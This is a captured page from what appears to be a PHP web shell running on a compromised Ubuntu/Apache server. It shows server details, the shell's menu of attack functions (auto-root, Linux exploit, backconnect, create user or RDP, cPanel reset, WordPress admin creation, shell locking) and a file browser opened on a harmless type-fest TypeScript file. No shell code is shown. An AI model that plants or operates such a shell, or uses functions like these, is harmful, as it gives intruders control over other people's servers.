Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
type-fest /
ts41 /
[ HOME SHELL ]
Name
Size
Permission
Action
camel-case.d.ts
2.06
KB
-rw-rw-r--
delimiter-case.d.ts
2.78
KB
-rw-rw-r--
index.d.ts
392
B
-rw-rw-r--
kebab-case.d.ts
686
B
-rw-rw-r--
pascal-case.d.ts
608
B
-rw-rw-r--
snake-case.d.ts
672
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kebab-case.d.ts
import {DelimiterCase} from './delimiter-case'; /** Convert a string literal to kebab-case. This can be useful when, for example, converting a camel-cased object property to a kebab-cased CSS class name or a command-line flag. @example ``` import {KebabCase} from 'type-fest'; // Simple const someVariable: KebabCase<'fooBar'> = 'foo-bar'; // Advanced type KebabCasedProps<T> = { [K in keyof T as KebabCase<K>]: T[K] }; interface CliOptions { dryRun: boolean; includeFile: string; foo: number; } const rawCliOptions: KebabCasedProps<CliOptions> = { 'dry-run': true, 'include-file': 'bar.js', foo: 123 }; ``` */ export type KebabCase<Value> = DelimiterCase<Value, '-'>;
Close